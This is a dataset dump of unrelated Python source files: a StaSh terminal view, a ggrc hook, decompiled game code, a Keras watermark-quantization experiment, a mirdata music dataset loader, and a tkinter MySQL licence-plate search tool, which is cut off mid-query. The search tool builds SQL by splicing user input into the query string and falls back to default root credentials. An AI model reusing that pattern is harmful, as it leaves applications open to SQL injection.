text
stringlengths 2
999k
|
|---|
# coding: utf-8
"""
Physical terminal is what an user sees.
"""
import ast
import logging
try:
import ui
from objc_util import *
except ImportError:
from . import dummyui as ui
from .dummyobjc_util import *
from .shcommon import CTRL_KEY_FLAG
try:
unicode
except NameError:
unicode = str
# ObjC related stuff
UIFont = ObjCClass("UIFont")
class ShTVDelegate(object):
def __init__(self, stash, terminal, mini_buffer, main_screen):
self.stash = stash
self.terminal = terminal
self.mini_buffer = mini_buffer
self.main_screen = main_screen
def textview_did_begin_editing(self, tv):
self.terminal.is_editing = True
def textview_did_end_editing(self, tv):
self.terminal.is_editing = False
def textview_should_change(self, tv, rng, replacement):
self.mini_buffer.feed(rng, replacement)
return False # always false
def textview_did_change(self, tv):
"""
The code is a fix to a possible UI system bug:
Some key-combos that delete texts, e.g. alt-delete, cmd-delete, from external
keyboard do not trigger textview_should_change event. So following checks
are added to ensure consistency between in-memory and actual UI.
"""
rng = self.terminal.selected_range
main_screen_text = self.main_screen.text
terminal_text = self.terminal.text
x_modifiable = self.main_screen.x_modifiable
if rng[0] == rng[1] and main_screen_text[rng[0] :] != terminal_text[rng[0] :]:
if rng[0] >= x_modifiable:
self.mini_buffer.feed(
None,
main_screen_text[x_modifiable : rng[0]] + terminal_text[rng[0] :],
)
self.mini_buffer.set_cursor(-len(terminal_text[rng[0] :]), whence=2)
else:
s = terminal_text[rng[0] :]
self.main_screen.intact_right_bound = rng[
0
] # mark the buffer to be re-rendered
# If the trailing string is shorter than the modifiable chars,
# this means there are valid deletion for the modifiable chars
# and we should keep it.
if len(s) < len(self.mini_buffer.modifiable_string):
self.mini_buffer.feed(None, s)
self.mini_buffer.set_cursor(0, whence=0)
else: # nothing should be deleted
self.mini_buffer.set_cursor(0, whence=2)
def textview_did_change_selection(self, tv):
# This callback was used to provide approximated support for H-Up/Dn
# shortcuts from an external keyboard. It is no longer necessary as
# proper external keyboard support is now possible with objc_util.
# If cursor is in sync already, as a result of renderer call, flag it
# to False for future checking.
if self.terminal.cursor_synced:
self.terminal.cursor_synced = False
else:
# Sync the cursor position on terminal to main screen
# Mainly used for when user touches and changes the terminal cursor position.
self.mini_buffer.sync_cursor(self.terminal.selected_range)
# noinspection PyAttributeOutsideInit,PyUnusedLocal,PyPep8Naming
class ShTerminal(object):
"""
This is a wrapper class of the actual TextView that subclass the SUITextView.
The wrapper is used to encapsulate the objc calls so that it behaves more like
a regular ui.TextView.
"""
def __init__(self, stash, superview, width, height, debug=False):
self.debug = debug
self.logger = logging.getLogger("StaSh.Terminal")
self.stash = stash
stash.terminal = self
# whether the terminal cursor position is in sync with main screen
self.cursor_synced = False
# Create the actual TextView by subclass SUITextView
UIKeyCommand = ObjCClass("UIKeyCommand")
def kcDispatcher_(_self, _cmd, _sender):
key_cmd = ObjCInstance(_sender)
stash.user_action_proxy.kc_pressed(
str(key_cmd.input()), key_cmd.modifierFlags()
)
def keyCommands(_self, _cmd):
key_commands = [
UIKeyCommand.keyCommandWithInput_modifierFlags_action_(
"C", CTRL_KEY_FLAG, "kcDispatcher:"
),
UIKeyCommand.keyCommandWithInput_modifierFlags_action_(
"D", CTRL_KEY_FLAG, "kcDispatcher:"
),
UIKeyCommand.keyCommandWithInput_modifierFlags_action_(
"P", CTRL_KEY_FLAG, "kcDispatcher:"
),
UIKeyCommand.keyCommandWithInput_modifierFlags_action_(
"N", CTRL_KEY_FLAG, "kcDispatcher:"
),
UIKeyCommand.keyCommandWithInput_modifierFlags_action_(
"K", CTRL_KEY_FLAG, "kcDispatcher:"
),
UIKeyCommand.keyCommandWithInput_modifierFlags_action_(
"U", CTRL_KEY_FLAG, "kcDispatcher:"
),
UIKeyCommand.keyCommandWithInput_modifierFlags_action_(
"A", CTRL_KEY_FLAG, "kcDispatcher:"
),
UIKeyCommand.keyCommandWithInput_modifierFlags_action_(
"E", CTRL_KEY_FLAG, "kcDispatcher:"
),
UIKeyCommand.keyCommandWithInput_modifierFlags_action_(
"W", CTRL_KEY_FLAG, "kcDispatcher:"
),
UIKeyCommand.keyCommandWithInput_modifierFlags_action_(
"L", CTRL_KEY_FLAG, "kcDispatcher:"
),
UIKeyCommand.keyCommandWithInput_modifierFlags_action_(
"Z", CTRL_KEY_FLAG, "kcDispatcher:"
),
UIKeyCommand.keyCommandWithInput_modifierFlags_action_(
"[", CTRL_KEY_FLAG, "kcDispatcher:"
),
UIKeyCommand.keyCommandWithInput_modifierFlags_action_(
"]", CTRL_KEY_FLAG, "kcDispatcher:"
),
UIKeyCommand.keyCommandWithInput_modifierFlags_action_(
"UIKeyInputUpArrow", 0, "kcDispatcher:"
),
UIKeyCommand.keyCommandWithInput_modifierFlags_action_(
"UIKeyInputDownArrow", 0, "kcDispatcher:"
),
UIKeyCommand.keyCommandWithInput_modifierFlags_action_(
"UIKeyInputLeftArrow", 0, "kcDispatcher:"
),
UIKeyCommand.keyCommandWithInput_modifierFlags_action_(
"UIKeyInputRightArrow", 0, "kcDispatcher:"
),
]
commands = ns(key_commands)
return commands.ptr
def dummyAction():
pass
def controlCAction():
ui = stash.ui
stash.ui.vk_tapped(ui.k_CC)
def controlDAction():
ui = stash.ui
ui.vk_tapped(ui.k_CD)
def controlPAction():
ui = stash.ui
ui.vk_tapped(ui.k_hup)
def controlNAction():
ui = stash.ui
ui.vk_tapped(ui.k_hdn)
def controlKAction():
stash.mini_buffer.feed(stash.mini_buffer.RANGE_CURSOR_TO_END, "")
def controlUAction():
ui = stash.ui
ui.vk_tapped(ui.k_CU)
def controlAAction(): # Move cursor to beginning of the input
stash.mini_buffer.set_cursor(0)
def controlEAction(): # Move cursor to end of the input
stash.mini_buffer.set_cursor(0, whence=2)
def controlWAction(): # delete one word backwards
stash.mini_buffer.delete_word(self.selected_range)
def controlLAction(): # delete one word backwards
stash.stream.feed(u"\u009bc%s" % stash.runtime.get_prompt(), no_wait=True)
def controlZAction():
stash.runtime.push_to_background()
def arrowUpAction():
ui = stash.ui
ui.vk_tapped(ui.k_hup)
def arrowDownAction():
ui = stash.ui
ui.vk_tapped(ui.k_hdn)
def arrowLeftAction():
stash.mini_buffer.set_cursor(-1, whence=1)
def arrowRightAction():
stash.mini_buffer.set_cursor(1, whence=1)
self.kc_handlers = {
("C", CTRL_KEY_FLAG): controlCAction,
("D", CTRL_KEY_FLAG): controlDAction,
("P", CTRL_KEY_FLAG): controlPAction,
("N", CTRL_KEY_FLAG): controlNAction,
("K", CTRL_KEY_FLAG): controlKAction,
("U", CTRL_KEY_FLAG): controlUAction,
("A", CTRL_KEY_FLAG): controlAAction,
("E", CTRL_KEY_FLAG): controlEAction,
("W", CTRL_KEY_FLAG): controlWAction,
("L", CTRL_KEY_FLAG): controlLAction,
("Z", CTRL_KEY_FLAG): controlZAction,
("[", CTRL_KEY_FLAG): dummyAction,
("]", CTRL_KEY_FLAG): dummyAction,
("UIKeyInputUpArrow", 0): arrowUpAction,
("UIKeyInputDownArrow", 0): arrowDownAction,
("UIKeyInputLeftArrow", 0): arrowLeftAction,
("UIKeyInputRightArrow", 0): arrowRightAction,
}
_ShTerminal = create_objc_class(
"_ShTerminal", ObjCClass("SUITextView"), [keyCommands, kcDispatcher_]
)
self.is_editing = False
self.superview = superview
self._delegate_view = ui.TextView()
self._delegate_view.delegate = stash.user_action_proxy.tv_delegate
self.tv_delegate = ShTVDelegate(
stash, self, stash.mini_buffer, stash.main_screen
)
self.tvo = (
_ShTerminal.alloc().initWithFrame_(((0, 0), (width, height))).autorelease()
)
self.tvo.setAutoresizingMask_(1 << 1 | 1 << 4) # flex Width and Height
self.content_inset = (0, 0, 0, 0)
self.auto_content_inset = False
self.background_color = ast.literal_eval(
stash.config.get("display", "BACKGROUND_COLOR")
)
font_size = stash.config.getint("display", "TEXT_FONT_SIZE")
self.default_font = UIFont.fontWithName_size_("Menlo-Regular", font_size)
self.bold_font = UIFont.fontWithName_size_("Menlo-Bold", font_size)
self.italic_font = UIFont.fontWithName_size_("Menlo-Italic", font_size)
self.bold_italic_font = UIFont.fontWithName_size_("Menlo-BoldItalic", font_size)
self.text_color = ast.literal_eval(stash.config.get("display", "TEXT_COLOR"))
self.tint_color = ast.literal_eval(stash.config.get("display", "TINT_COLOR"))
self.indicator_style = stash.config.get("display", "INDICATOR_STYLE")
self.autocapitalization_type = ui.AUTOCAPITALIZE_NONE
self.autocorrection_type = 1
self.spellchecking_type = 1
# This setting helps preventing textview from jumping back to top
self.non_contiguous_layout = False
# Allow editing to the text attributes
# self.editing_text_attributes = True
ObjCInstance(self.superview).addSubview_(self.tvo)
self.delegate = self._delegate_view
# TextStorage
self.tso = self.tvo.textStorage()
@property
def delegate(self):
return self._delegate_view.delegate
@delegate.setter
@on_main_thread
def delegate(self, value):
self.tvo.setDelegate_(ObjCInstance(value).delegate())
@property
def background_color(self):
return self._background_color
@background_color.setter
@on_main_thread
def background_color(self, value):
self._background_color = value
r, g, b, a = ui.parse_color(value)
self.tvo.setBackgroundColor_(UIColor.colorWithRed_green_blue_alpha_(r, g, b, 1))
@property
def text_font(self):
return self._text_font
@text_font.setter
@on_main_thread
def text_font(self, value):
name, size = self._text_font = value
self.tvo.setFont_(UIFont.fontWithName_size_(name, size))
@property
def indicator_style(self):
return self.tvo.indicatorStyle()
@indicator_style.setter
@on_main_thread
def indicator_style(self, value):
choices = {
"default": 0,
"black": 1,
"white": 2,
}
self.tvo.setIndicatorStyle_(choices[value])
@property
def text_color(self):
return self._text_color
@text_color.setter
@on_main_thread
def text_color(self, value):
self._text_color = value
r, g, b, a = ui.parse_color(value)
self.tvo.setTextColor_(UIColor.colorWithRed_green_blue_alpha_(r, g, b, 1))
@property
def tint_color(self):
return self._tint_color
@tint_color.setter
@on_main_thread
def tint_color(self, value):
self._tint_color = value
r, g, b, a = ui.parse_color(value)
self.tvo.setTintColor_(UIColor.colorWithRed_green_blue_alpha_(r, g, b, 1))
@property
def text(self):
return unicode(self.tvo.text())
@text.setter
@on_main_thread
def text(self, value):
self.tvo.setText_(value)
@property
def text_length(self):
return self.tvo.text().length()
@property
def attributed_text(self):
return self.tvo.attributedText()
@attributed_text.setter
@on_main_thread
def attributed_text(self, value):
self.tvo.setAttributedText_(value)
@property
def selected_range(self):
nsrange = self.tvo.selectedRange()
return nsrange.location, nsrange.location + nsrange.length
@selected_range.setter
@on_main_thread
def selected_range(self, rng):
"""
Set the cursor selection range. Note it checks the current range first and
only change it if the new range is different. This is to avoid setting
unwanted cursor_synced flag. Without the check, the cursor is repositioned
with the same range, this turn on the cursor_synced flag BUT will NOT trigger
the did_change_selection event (which is paired to cancel the cursor_synced
flag).
"""
if self.selected_range != rng:
self.cursor_synced = True
self.tvo.setSelectedRange_((rng[0], rng[1] - rng[0]))
@property
def autocapitalization_type(self):
return self._autocapitalization_type
@autocapitalization_type.setter
@on_main_thread
def autocapitalization_type(self, value):
self._autocapitalization_type = value
self.tvo.performSelector_withObject_("setAutocapitalizationType:", value)
@property
def autocorrection_type(self):
return self._autocorrection_type
@autocorrection_type.setter
@on_main_thread
def autocorrection_type(self, value):
self._autocorrection_type = value
ObjCInstanceMethod(self.tvo, "setAutocorrectionType:")(value)
@property
def spellchecking_type(self):
return self._spellchecking_type
@spellchecking_type.setter
@on_main_thread
def spellchecking_type(self, value):
self._spellchecking_type = value
self.tvo.performSelector_withObject_("setSpellCheckingType:", value)
@property
def content_inset(self):
return self._content_inset
@content_inset.setter
@on_main_thread
def content_inset(self, value):
self._content_inset = value
insetStructure = self.tvo.contentInset()
(
insetStructure.top,
insetStructure.left,
insetStructure.bottom,
insetStructure.right,
) = value
@property
def auto_content_inset(self):
return self._auto_content_inset
@auto_content_inset.setter
@on_main_thread
def auto_content_inset(self, value):
self._auto_content_inset = value
self.tvo.setAutomaticallyAdjustsContentInsetForKeyboard_(value)
@property
def non_contiguous_layout(self):
return self._non_contiguous_layout
@non_contiguous_layout.setter
@on_main_thread
def non_contiguous_layout(self, value):
self._non_contiguous_layout = value
self.tvo.layoutManager().setAllowsNonContiguousLayout_(value)
@property
def editing_text_attributes(self):
return self._editing_text_attributes
@editing_text_attributes.setter
@on_main_thread
def editing_text_attributes(self, value):
self._editing_text_attributes = value
self.tvo.setAllowsEditingTextAttributes_(value)
@on_main_thread
def scroll_range_to_visible(self, rng):
self.tvo.scrollRangeToVisible_(rng)
@property
def size(self):
size = self.tvo.size()
return size.width, size.height
@size.setter
@on_main_thread
def size(self, value):
"""
Set the width and height of the view
:param value: A tuple of (width, height)
"""
self.tvo.setSize_(value)
@property
def content_size(self):
size = self.tvo.contentSize()
return size.width, size.height
@property
def content_offset(self):
point = self.tvo.contentOffset()
return point.x, point.y
@property
def visible_rect(self):
rect = self.tvo.visibleRect()
return rect.size.width, rect.size.height, rect.origin.x, rect.origin.y
@on_main_thread
def scroll_to_end(self):
content_height = self.content_size[1]
# rect_height is the visible rect's height
# rect_y is the y location where the visible rect locates in the
# coordinate of content_size
_, rect_height, _, rect_y = self.visible_rect
# If the space below rect_y is more than the visible rect's height,
# or if the visible rect is over-scrolled, scroll to the last line.
if content_height - rect_y > rect_height or (
content_height > rect_height > content_height - rect_y
): # over-scroll
self.tvo.scrollRangeToVisible_((len(self.text), 0))
@on_main_thread
def begin_editing(self):
self.tvo.becomeFirstResponder()
@on_main_thread
def end_editing(self):
self.tvo.resignFirstResponder()
# noinspection PyCallingNonCallable
def kc_pressed(self, key, modifierFlags):
handler = self.kc_handlers.get((key, modifierFlags), None)
if handler:
handler()
class StubTerminal(ObjCClass):
def __init__(self, stash, *args, **kwargs):
self.stash = stash
stash.terminal = self
self.text = ""
super(StubTerminal, self).__init__(*args, **kwargs)
|
# Copyright (C) 2016 Google Inc.
# Licensed under http://www.apache.org/licenses/LICENSE-2.0 <see LICENSE file>
"""A module with Comment object creation hooks"""
from ggrc import db
from ggrc.login import get_current_user_id
from ggrc.models.all_models import Comment, ObjectOwner
from ggrc.services.common import Resource
def init_hook():
"""Initialize all hooks"""
# pylint: disable=unused-variable
@Resource.model_posted_after_commit.connect_via(Comment)
def handle_comment_post(sender, obj=None, src=None, service=None):
"""Save information on which user created the Comment object
Args:
sender: the class of the object that initiated the server request
obj: the instance of `sender` that initiated the server request
src: a dictionary containing the POST data sent with request
service: the server-side API service that handled the request
Returns:
None
"""
# pylint: disable=unused-argument
creator_id = get_current_user_id()
obj_owner = ObjectOwner(
person_id=creator_id,
ownable_id=obj.id,
ownable_type=obj.type,
)
db.session.add(obj_owner)
|
# uncompyle6 version 3.2.4
# Python bytecode 2.7 (62211)
# Decompiled from: Python 2.7.15 (v2.7.15:ca079a3ea3, Apr 30 2018, 16:30:26) [MSC v.1500 64 bit (AMD64)]
# Embedded file name: lib.coginvasion.quest.CogObjective
from direct.directnotify.DirectNotifyGlobal import directNotify
class CogObjective:
notify = directNotify.newCategory('CogObjective')
def __init__(self, amount, level=None, levelRange=None, name=None, variant=None, dept=None):
self.neededAmount = amount
self.amount = 0
self.level = level
self.levelRange = levelRange
self.name = name
self.dept = dept
self.variant = variant
def handleCogDeath(self, cog):
if not self.location or self.isOnLocation(cog.zoneId):
if self.level and not cog.getLevel() == self.level:
return
if self.levelRange and not self.isInLevelRange(cog.getLevel()):
return
if self.name and not cog.getName() == self.name:
return
if self.dept and not cog.getDept() == self.dept:
return
if self.variant and not cog.getVariant() == self.variant:
return
self.amount += 1
self.updateQuest()
def finished(self):
return self.amount == self.neededAmount
def isInLevelRange(self, level):
if self.levelRange:
return self.levelRange[0] <= level and self.levelRange[1] >= level
return False
|
##### This code works on Keras version 2.2.4 with Tensorflow nightly version 1.14.1-dev20190402
import keras
from keras.optimizers import Adam,SGD
from keras import backend as K
from keras.models import Model, load_model
from keras.datasets import cifar10
import numpy as np
import random
import sys
import os, psutil
pid = os.getpid()
py = psutil.Process(pid)
def Quantize_model(model_file, quantization_bits = 8):
model = load_model(model_file,compile=False)
model.compile(loss='categorical_crossentropy',
optimizer=SGD(),
metrics=['accuracy'])
###################### weight Quantization ################
layers_quantization_info = {}
for layer in model.layers:
if layer.count_params() != 0:
layer_parameters = layer.get_weights()
max_param = max([np.max(X) for X in layer_parameters])
step_size = max_param / (2**(quantization_bits-1)-1)
layer_parameters_signed_integer = [np.round(X/step_size) for X in layer_parameters]
layer.set_weights([np.round(X/step_size)* step_size for X in layer_parameters])
layers_quantization_info[layer.name] = (layer_parameters_signed_integer, step_size)
return model, layers_quantization_info
def equal_split(X,Y,train_set_sample_per_label,number_of_labels):
x_train_split = []
y_train_split = []
x_test_split = []
y_test_split = []
for label in range(number_of_labels):
max_sample_size = len(list(np.where(np.argmax(Y,axis=1)[:]==label)[0]))
train_idx = random.sample(list(np.where(np.argmax(Y,axis=1)[:]==label)[0]),min(train_set_sample_per_label,max_sample_size))
test_idx = list(set(np.where(np.argmax(Y,axis=1)[:]==label)[0]).difference(set(train_idx)))
train_images = X[train_idx,::]
train_labels = Y[train_idx,::]
test_images = X[test_idx,::]
test_labels = Y[test_idx,::]
if label == 0 :
x_train_split = train_images
y_train_split = train_labels
x_test_split = test_images
y_test_split = test_labels
else:
x_train_split = np.vstack((x_train_split,train_images))
y_train_split = np.vstack((y_train_split,train_labels))
x_test_split = np.vstack((x_test_split,test_images))
y_test_split = np.vstack((y_test_split,test_labels))
return x_train_split, x_test_split, y_train_split, y_test_split
def performance_check(model, grad_select, watermark, key_embed, watermarked_training_images, watermarked_training_images_label,num_pixels):
###############################################################################
y_true = K.placeholder(shape=model.output.shape)
cross_ent = K.categorical_crossentropy(y_true,model.output)
get_grads = K.function([model.input,y_true],K.gradients(cross_ent,model.input))
################################################################################
trial_results = []
for _ in range(5):
idx = random.sample(range(watermarked_training_images.shape[0]),50)
grad_x = watermarked_training_images[idx,::]
grad_y = watermarked_training_images_label[idx,::]
gradients = K.variable(get_grads([grad_x,grad_y])[0])
mean_gradients = K.mean(gradients,axis=0)
flattened_mean_grads = K.flatten(mean_gradients)
selected_mean_grads = K.reshape(K.switch(1.0-grad_select,K.zeros_like(flattened_mean_grads),flattened_mean_grads),shape=(num_pixels,1))
projection = K.cast(K.reshape(0 <= (K.dot(key_embed,selected_mean_grads)),watermark.shape),K.floatx())
wm_tr_acc = 1.00 - K.mean(K.abs(projection-watermark))
trial_results.append(K.get_value(wm_tr_acc))
############################################################################################################
mean_wm_acc = sum(trial_results)/len(trial_results)
return mean_wm_acc
########################################################################
########################################################################
########################################################################
num_available_samples_per_label = 2048
target_class_label = 0.
num_classes = 10
(x_train, y_train), (x_test, y_test) = cifar10.load_data()
num_pixels = x_train.shape[1]*x_train.shape[2]*x_train.shape[3]
input_shape = x_train.shape[1:]
##################### Creating the watermark training images #########
idx = np.where(y_train[:]==target_class_label)[0]
watermarked_training_images = x_train[idx,::]
watermarked_training_images_label = y_train[idx,::]
###################### Creating the watermark testing images ###########
idx = np.where(y_test[:]==target_class_label)[0]
watermarked_testing_images = x_test[idx,::]
watermarked_testing_images_label = y_test[idx,::]
#######################################################################
# Normalize data.
x_train = x_train.astype('float32') / 255
x_test = x_test.astype('float32') / 255
watermarked_testing_images = watermarked_testing_images.astype('float32') / 255
watermarked_training_images = watermarked_training_images.astype('float32') / 255
# subtracting pixel mean
x_train_mean = np.mean(x_train, axis=0)
x_train -= x_train_mean
x_test -= x_train_mean
watermarked_training_images -= x_train_mean
watermarked_testing_images -= x_train_mean
y_train = keras.utils.to_categorical(y_train, num_classes)
y_test = keras.utils.to_categorical(y_test, num_classes)
watermarked_training_images_label = keras.utils.to_categorical(watermarked_training_images_label,num_classes)
watermarked_testing_images_label = keras.utils.to_categorical(watermarked_testing_images_label,num_classes)
###################################################
model_type = '64-bit-CIFAR10'
model = load_model(model_type+'.hdf5',compile=False)
opt = Adam(lr=0.0001, decay=1e-6)
model.compile(loss='categorical_crossentropy',
optimizer=opt,
metrics=['accuracy'])
watermark = K.variable(np.load('wm.npy'))
key_embed = K.variable(np.load('embed_key_extended.npy'))
grad_select = K.variable(np.load("grad_select.npy"))
wm_acc = performance_check(model = model, grad_select = grad_select, watermark = watermark,key_embed = key_embed,
watermarked_training_images = watermarked_training_images,watermarked_training_images_label = watermarked_training_images_label
,num_pixels = num_pixels)
base_line = model.evaluate(x_test,y_test,verbose=0)[1]
print("Model's original accuracy: ", base_line)
for q_bits in [8,16]:
print("----------------------------- ", q_bits, " -bits quantization ---------------------------------")
q_model,layers_quantization_info = Quantize_model(model_file=model_type+'.hdf5',quantization_bits=q_bits)
wm_acc = performance_check(model = q_model, grad_select = grad_select, watermark = watermark,key_embed = key_embed,
watermarked_training_images = watermarked_training_images,watermarked_training_images_label = watermarked_training_images_label
,num_pixels = num_pixels)
test_acc = q_model.evaluate(x_test,y_test,verbose=0)[1]
print("Watermark accuracy after quantization: ", wm_acc, " Model's accuracy after quantization: ", test_acc)
|
"""Medley-solos-DB Dataset Loader.
.. admonition:: Dataset Info
:class: dropdown
Medley-solos-DB is a cross-collection dataset for automatic musical instrument
recognition in solo recordings. It consists of a training set of 3-second audio
clips, which are extracted from the MedleyDB dataset (Bittner et al., ISMIR 2014)
as well as a test set of 3-second clips, which are extracted from the solosDB
dataset (Essid et al., IEEE TASLP 2009).
Each of these clips contains a single instrument among a taxonomy of eight:
0. clarinet,
1. distorted electric guitar,
2. female singer,
3. flute,
4. piano,
5. tenor saxophone,
6. trumpet, and
7. violin.
The Medley-solos-DB dataset is the dataset that is used in the benchmarks of
musical instrument recognition in the publications of Lostanlen and Cella
(ISMIR 2016) and Andén et al. (IEEE TSP 2019).
"""
import csv
import logging
import os
from typing import BinaryIO, Optional, TextIO, Tuple
import librosa
import numpy as np
from mirdata import download_utils
from mirdata import jams_utils
from mirdata import core
from mirdata import io
BIBTEX = """@inproceedings{lostanlen2019ismir,
title={Deep Convolutional Networks in the Pitch Spiral for Musical Instrument Recognition},
author={Lostanlen, Vincent and Cella, Carmine Emanuele},
booktitle={International Society of Music Information Retrieval (ISMIR)},
year={2016}
}"""
REMOTES = {
"annotations": download_utils.RemoteFileMetadata(
filename="Medley-solos-DB_metadata.csv",
url="https://zenodo.org/record/3464194/files/Medley-solos-DB_metadata.csv?download=1",
checksum="fda6a589c56785f2195c9227809c521a",
destination_dir="annotation",
),
"audio": download_utils.RemoteFileMetadata(
filename="Medley-solos-DB.tar.gz",
url="https://zenodo.org/record/3464194/files/Medley-solos-DB.tar.gz?download=1",
checksum="f5facf398793ef5c1f80c013afdf3e5f",
destination_dir="audio",
),
}
LICENSE_INFO = "Creative Commons Attribution 4.0 International."
class Track(core.Track):
"""medley_solos_db Track class
Args:
track_id (str): track id of the track
Attributes:
audio_path (str): path to the track's audio file
instrument (str): instrument encoded by its English name
instrument_id (int): instrument encoded as an integer
song_id (int): song encoded as an integer
subset (str): either equal to 'train', 'validation', or 'test'
track_id (str): track id
"""
def __init__(
self,
track_id,
data_home,
dataset_name,
index,
metadata,
):
super().__init__(
track_id,
data_home,
dataset_name,
index,
metadata,
)
self.audio_path = os.path.join(self._data_home, self._track_paths["audio"][0])
@property
def instrument(self):
return self._track_metadata.get("instrument")
@property
def instrument_id(self):
return self._track_metadata.get("instrument_id")
@property
def song_id(self):
return self._track_metadata.get("song_id")
@property
def subset(self):
return self._track_metadata.get("subset")
@property
def audio(self) -> Optional[Tuple[np.ndarray, float]]:
"""The track's audio
Returns:
* np.ndarray - audio signal
* float - sample rate
"""
return load_audio(self.audio_path)
def to_jams(self):
"""Get the track's data in jams format
Returns:
jams.JAMS: the track's data in jams format
"""
return jams_utils.jams_converter(
audio_path=self.audio_path, metadata=self._track_metadata
)
@io.coerce_to_bytes_io
def load_audio(fhandle: BinaryIO) -> Tuple[np.ndarray, float]:
"""Load a Medley Solos DB audio file.
Args:
fhandle (str or file-like): File-like object or path to audio file
Returns:
* np.ndarray - the mono audio signal
* float - The sample rate of the audio file
"""
return librosa.load(fhandle, sr=22050, mono=True)
@core.docstring_inherit(core.Dataset)
class Dataset(core.Dataset):
"""
The medley_solos_db dataset
"""
def __init__(self, data_home=None):
super().__init__(
data_home,
name="medley_solos_db",
track_class=Track,
bibtex=BIBTEX,
remotes=REMOTES,
license_info=LICENSE_INFO,
)
@core.cached_property
def _metadata(self):
metadata_path = os.path.join(
self.data_home, "annotation", "Medley-solos-DB_metadata.csv"
)
if not os.path.exists(metadata_path):
raise FileNotFoundError("Metadata not found. Did you run .download()?")
metadata_index = {}
with open(metadata_path, "r") as fhandle:
csv_reader = csv.reader(fhandle, delimiter=",")
next(csv_reader)
for row in csv_reader:
subset, instrument_str, instrument_id, song_id, track_id = row
metadata_index[str(track_id)] = {
"subset": str(subset),
"instrument": str(instrument_str),
"instrument_id": int(instrument_id),
"song_id": int(song_id),
}
return metadata_index
@core.copy_docs(load_audio)
def load_audio(self, *args, **kwargs):
return load_audio(*args, **kwargs)
|
#!/usr/bin/python3
# -*- coding: utf-8 -*-
__author__ = 'muwfm'
import tkinter as tk
from tkinter import ttk
from tkinter.filedialog import *
import tkinter.messagebox
import pymysql
class Search(ttk.Frame):
def __init__(self, win):
ttk.Frame.__init__(self, win)
frame00 = ttk.Frame(self)
frame0 = ttk.Frame(self)
frame1 = ttk.Frame(self)
frame2 = ttk.Frame(self)
frame3 = ttk.Frame(self)
frame4 = ttk.Frame(self)
frame5 = ttk.Frame(self)
frame6 = ttk.Frame(self)
win.title("车牌数据库查询")
# win.minsize(920, 600)
self.s1 = StringVar()
self.s2 = StringVar()
self.s3 = StringVar()
self.s4 = StringVar()
self.s5 = StringVar()
self.s6 = StringVar()
frame00.pack(side=TOP, fill=tk.Y, expand=1)
frame0.pack(side=TOP, fill=tk.Y, expand=1)
frame1.pack(side=TOP, fill=tk.Y, expand=1)
frame2.pack(side=TOP, fill=tk.Y, expand=1)
frame3.pack(side=TOP, fill=tk.Y, expand=1)
frame4.pack(side=TOP, fill=tk.Y, expand=1)
frame6.pack(side=TOP, fill=tk.Y, expand=1)
frame5.pack(side=TOP, fill=tk.Y, expand=1)
self.t = Text(frame00, width=100)
self.t.pack()
self.t.insert('1.0', "此处显示查询结果\n")
self.label0 = ttk.Label(frame0, text='数据库地址:', width=10)
self.label0.pack(side=LEFT)
self.input0 = ttk.Entry(frame0, textvariable=self.s1, width=30)
self.input0.pack(side=RIGHT)
self.label = ttk.Label(frame1, text='用户名:', width=10)
self.label.pack(side=LEFT)
self.input1 = ttk.Entry(frame1, textvariable=self.s2, width=30)
self.input1.pack(side=RIGHT)
self.label2 = ttk.Label(frame2, text='密码: ', width=10)
self.label2.pack(side=LEFT)
self.input2 = ttk.Entry(frame2, textvariable=self.s3, width=30)
self.input2.pack(side=RIGHT)
self.label3 = ttk.Label(frame3, text='数据库名称: ', width=10)
self.label3.pack(side=LEFT)
self.input3 = ttk.Entry(frame3, textvariable=self.s4, width=30)
self.input3.pack(side=RIGHT)
self.label4 = ttk.Label(frame4, text='数据表名称: ', width=10)
self.label4.pack(side=LEFT)
self.input4 = ttk.Entry(frame4, textvariable=self.s5, width=30)
self.input4.pack(side=RIGHT)
self.input5 = ttk.Entry(frame6, textvariable=self.s6, width=30)
self.input5.pack(side=LEFT)
self.label5 = ttk.Button(frame6, text='关键字查询', width=10, command=self.sql2)
self.label5.pack(side=RIGHT)
self.clean_button = ttk.Button(frame5, text="清楚输入信息", width=15, command=self.clean)
self.clean_button.pack(side=LEFT)
self.url_face_button = ttk.Button(frame5, text="开始查询", width=15, command=self.sql)
self.url_face_button.pack(side=LEFT)
self.pack(fill=tk.BOTH, expand=tk.YES, padx="10", pady="10")
self.center_window()
def sql(self):
self.t.delete(1.0, END)
NAME1 = self.input0.get() or "localhost"
USRE1 = self.input1.get() or "root"
PASS1 = self.input2.get() or "123456"
SQLNAME1 = self.input3.get() or "chepai1"
TABLENAME1 = self.input4.get() or "carinfo"
self.select_sql(NAME1, USRE1, PASS1, SQLNAME1, TABLENAME1)
def sql2(self):
self.t.delete(1.0, END)
NAME1 = self.input0.get() or "localhost"
USRE1 = self.input1.get() or "root"
PASS1 = self.input2.get() or "123456"
SQLNAME1 = self.input3.get() or "chepai1"
TABLENAME1 = self.input4.get() or "carinfo"
CARPLA1 = self.input5.get()
if (CARPLA1==""):
tkinter.messagebox.showinfo(title='车牌数据库系统', message='关键字不能为空')
return
CARPLA1 = "%" + CARPLA1 + "%"
self.select_sql2(NAME1, USRE1, PASS1, SQLNAME1, TABLENAME1, CARPLA1)
def clean(self):
self.s1.set("")
self.s2.set("")
self.s3.set("")
self.s4.set("")
self.s5.set("")
self.s6.set("")
self.t.delete(1.0, END)
def select_sql(self, NAME, USRE, PASS, SQLNAME, TABLENAME):
# 打开数据库连接
try:
# 打开数据库连接
db = pymysql.connect(NAME, USRE, PASS, SQLNAME)
except:
print("数据库连接失败")
self.t.insert('1.0', "数据库连接失败")
return
# 使用cursor()方法获取操作游标
cursor = db.cursor()
# SQL 查询语句
sql = "SELECT * FROM %s" % (TABLENAME)
# print(sql)
try:
# 执行SQL语句
cursor.execute(sql)
# 获取所有记录列表
results = cursor.fetchall()
for row in results:
row2 = str(row) + "\n"
self.t.insert('1.0', row2)
self.t.insert('1.0', "-----------------------------"
"------------------------------"
"------------------------------"
"--------\n")
# print(row)
# print(results)
except:
return 0
# 关闭数据库连接
db.close()
def select_sql2(self, NAME, USRE, PASS, SQLNAME, TABLENAME, CARPLA):
# 打开数据库连接
try:
# 打开数据库连接
db = pymysql.connect(NAME, USRE, PASS, SQLNAME)
except:
print("数据库连接失败")
self.t.insert('1.0', "数据库连接失败")
return
# 使用cursor()方法获取操作游标
cursor = db.cursor()
# SQL 查询语句
sql = "SELECT * FROM %s WHERE TEXT1 like ('%s') or TEXT2 like ('%s') " \
"or API like ('%s') or COLOR1 like ('%s') or COLOR2 like ('%s')" \
